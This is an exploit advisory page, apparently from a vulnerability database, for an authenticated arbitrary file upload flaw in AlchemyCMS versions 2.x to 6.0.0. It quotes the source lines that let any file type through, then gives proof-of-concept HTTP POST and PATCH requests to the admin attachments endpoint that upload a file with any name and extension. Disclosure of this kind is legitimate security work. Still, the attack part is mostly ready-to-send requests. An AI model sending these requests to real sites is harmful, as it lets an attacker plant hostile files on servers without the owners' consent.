Alchemy CMS 6.0.0 Arbitrary File Upload

2021.10.13
Credit: Abdulrahman
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: AlchemyCMS 2.x to 6.0.0 - Unrestricted File Upload (authenticated) # Date: 01/10/2021 # Exploit Author: Abdulrahman https://twitter.com/infosec_90 # Vendor Homepage: https://alchemy-cms.com # Software Link: https://github.com/AlchemyCMS/alchemy_cms # Version: from 2.0 to 6.0.0 # Tested on: Linux ruby 2.6.8p205 rails 6 in /app/models/alchemy/attachment.rb line 82 : def allowed_filetypes Config.get(:uploader).fetch("allowed_filetypes", {}).fetch("alchemy/attachments", []) end end in /app/views/alchemy/admin/uploader/_button.html.erb in 18 configuration(:uploader)['allowed_filetypes'][object.class.model_name.collection] || ['*'] %> POC : POST /admin/attachments HTTP/1.1 ------WebKitFormBoundarydAup7dA7ub3Weccp Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext" Content-Type: application/octet-stream anything ------WebKitFormBoundarydAup7dA7ub3Weccp-- OR id = 8 for old attachment PATCH /admin/attachments/8 HTTP/1.1 ------WebKitFormBoundarylYnqNR9sxMPdw7Si Content-Disposition: form-data; name="_method" patch ------WebKitFormBoundarylYnqNR9sxMPdw7Si Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext" Content-Type: application/octet-stream anything ------WebKitFormBoundarylYnqNR9sxMPdw7Si--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top